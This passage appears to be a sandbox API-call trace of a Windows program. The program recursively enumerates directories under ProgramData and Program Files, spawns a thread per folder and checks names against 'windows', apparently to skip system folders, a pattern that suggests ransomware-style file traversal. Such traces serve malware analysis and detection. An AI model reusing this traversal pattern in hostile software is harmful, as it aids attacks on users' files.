lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans" [0043.303] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*.*" [0043.303] GlobalMemoryStatus (in: lpBuffer=0x119dfd10 | out: lpBuffer=0x119dfd10) [0043.303] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10de6dc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.304] CloseHandle (hObject=0x708) returned 1 [0043.304] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Support", cAlternateFileName="")) returned 1 [0043.304] lstrcmpW (lpString1=".", lpString2="Support") returned -1 [0043.304] lstrcmpW (lpString1="..", lpString2="Support") returned -1 [0043.304] lstrcmpiW (lpString1="windows", lpString2="Support") returned 1 [0043.307] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" [0043.307] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned 49 [0043.307] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\", lpString2="Support" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support" [0043.307] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*" [0043.307] GlobalMemoryStatus (in: lpBuffer=0x119dfd10 | out: lpBuffer=0x119dfd10) [0043.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f3f378, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.308] CloseHandle (hObject=0x708) returned 1 [0043.308] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Support", cAlternateFileName="")) returned 0 [0043.308] FindClose (in: hFindFile=0x671a30 | out: hFindFile=0x671a30) returned 1 Thread: id = 369 os_tid = 0x988 [0043.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*", lpFindFileData=0x17e1fd30 | out: lpFindFileData=0x17e1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719b0 [0043.315] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.315] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x17e1fd30 | out: lpFindFileData=0x17e1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.315] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.315] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.315] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x17e1fd30 | out: lpFindFileData=0x17e1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFax", cAlternateFileName="")) returned 1 [0043.315] lstrcmpW (lpString1=".", lpString2="MSFax") returned -1 [0043.315] lstrcmpW (lpString1="..", lpString2="MSFax") returned -1 [0043.315] lstrcmpiW (lpString1="windows", lpString2="MSFax") returned 1 [0043.315] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*" [0043.315] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*") returned 43 [0043.315] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\", lpString2="MSFax" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax" [0043.315] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*.*" [0043.315] GlobalMemoryStatus (in: lpBuffer=0x17e1fd10 | out: lpBuffer=0x17e1fd10) [0043.315] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1108f868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a0 [0043.319] CloseHandle (hObject=0x6a0) returned 1 [0043.319] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x17e1fd30 | out: lpFindFileData=0x17e1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSScan", cAlternateFileName="")) returned 1 [0043.319] lstrcmpW (lpString1=".", lpString2="MSScan") returned -1 [0043.319] lstrcmpW (lpString1="..", lpString2="MSScan") returned -1 [0043.319] lstrcmpiW (lpString1="windows", lpString2="MSScan") returned 1 [0043.319] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*" [0043.319] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*") returned 43 [0043.319] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\", lpString2="MSScan" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan" [0043.319] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*.*" [0043.319] GlobalMemoryStatus (in: lpBuffer=0x17e1fd10 | out: lpBuffer=0x17e1fd10) [0043.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1105f798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a0 [0043.321] CloseHandle (hObject=0x6a0) returned 1 [0043.321] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x17e1fd30 | out: lpFindFileData=0x17e1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSScan", cAlternateFileName="")) returned 0 [0043.322] FindClose (in: hFindFile=0x6719b0 | out: hFindFile=0x6719b0) returned 1 Thread: id = 370 os_tid = 0x98c [0043.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*.*", lpFindFileData=0x17f5fd30 | out: lpFindFileData=0x17f5fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a30 [0043.310] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.310] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x17f5fd30 | out: lpFindFileData=0x17f5fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.310] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.310] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x17f5fd30 | out: lpFindFileData=0x17f5fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0043.310] lstrcmpW (lpString1=".", lpString2="Profiles") returned -1 [0043.310] lstrcmpW (lpString1="..", lpString2="Profiles") returned -1 [0043.310] lstrcmpiW (lpString1="windows", lpString2="Profiles") returned 1 [0043.310] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*.*" [0043.310] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*.*") returned 40 [0043.310] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\", lpString2="Profiles" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles" [0043.310] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*.*" [0043.310] GlobalMemoryStatus (in: lpBuffer=0x17f5fd10 | out: lpBuffer=0x17f5fd10) [0043.310] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1102f6c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.317] CloseHandle (hObject=0x708) returned 1 [0043.317] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x17f5fd30 | out: lpFindFileData=0x17f5fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 0 [0043.317] FindClose (in: hFindFile=0x671a30 | out: hFindFile=0x671a30) returned 1 Thread: id = 371 os_tid = 0x980 [0043.289] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*", lpFindFileData=0x1809fd30 | out: lpFindFileData=0x1809fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a30 [0043.290] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.290] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x1809fd30 | out: lpFindFileData=0x1809fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.290] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.290] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.290] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x1809fd30 | out: lpFindFileData=0x1809fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 1 [0043.290] lstrcmpW (lpString1=".", lpString2="Patch") returned -1 [0043.290] lstrcmpW (lpString1="..", lpString2="Patch") returned -1 [0043.290] lstrcmpiW (lpString1="windows", lpString2="Patch") returned 1 [0043.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*" [0043.290] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*") returned 86 [0043.290] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\", lpString2="Patch" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" [0043.290] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*" [0043.290] GlobalMemoryStatus (in: lpBuffer=0x1809fd10 | out: lpBuffer=0x1809fd10) [0043.290] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5dc88d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.294] CloseHandle (hObject=0x708) returned 1 [0043.294] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x1809fd30 | out: lpFindFileData=0x1809fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 0 [0043.294] FindClose (in: hFindFile=0x671a30 | out: hFindFile=0x671a30) returned 1 Thread: id = 372 os_tid = 0xa90 [0043.292] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*", lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719b0 [0043.292] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.292] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.292] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.292] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.292] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x974da2e9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x974da2e9, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.0", cAlternateFileName="")) returned 1 [0043.292] lstrcmpW (lpString1=".", lpString2="v3.0") returned -1 [0043.293] lstrcmpW (lpString1="..", lpString2="v3.0") returned -1 [0043.293] lstrcmpiW (lpString1="windows", lpString2="v3.0") returned 1 [0043.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*" [0043.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*") returned 65 [0043.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\", lpString2="v3.0" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0" [0043.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0043.293] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0043.293] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x42205f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a0 [0043.297] CloseHandle (hObject=0x6a0) returned 1 [0043.297] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x96e4e65d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x96e4e65d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0043.297] lstrcmpW (lpString1=".", lpString2="v3.5") returned -1 [0043.297] lstrcmpW (lpString1="..", lpString2="v3.5") returned -1 [0043.297] lstrcmpiW (lpString1="windows", lpString2="v3.5") returned 1 [0043.297] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*" [0043.297] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*") returned 65 [0043.297] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\", lpString2="v3.5" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5" [0043.297] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0043.297] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0043.297] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11077800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a0 [0043.314] CloseHandle (hObject=0x6a0) returned 1 [0043.314] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x96e4e65d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x96e4e65d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0043.314] FindClose (in: hFindFile=0x6719b0 | out: hFindFile=0x6719b0) returned 1 Thread: id = 373 os_tid = 0xa98 [0043.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*", lpFindFileData=0x12ddfd30 | out: lpFindFileData=0x12ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671b70 [0043.347] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.347] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x12ddfd30 | out: lpFindFileData=0x12ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.347] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.347] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.347] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x12ddfd30 | out: lpFindFileData=0x12ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0043.347] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0043.347] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0043.347] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0043.347] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package 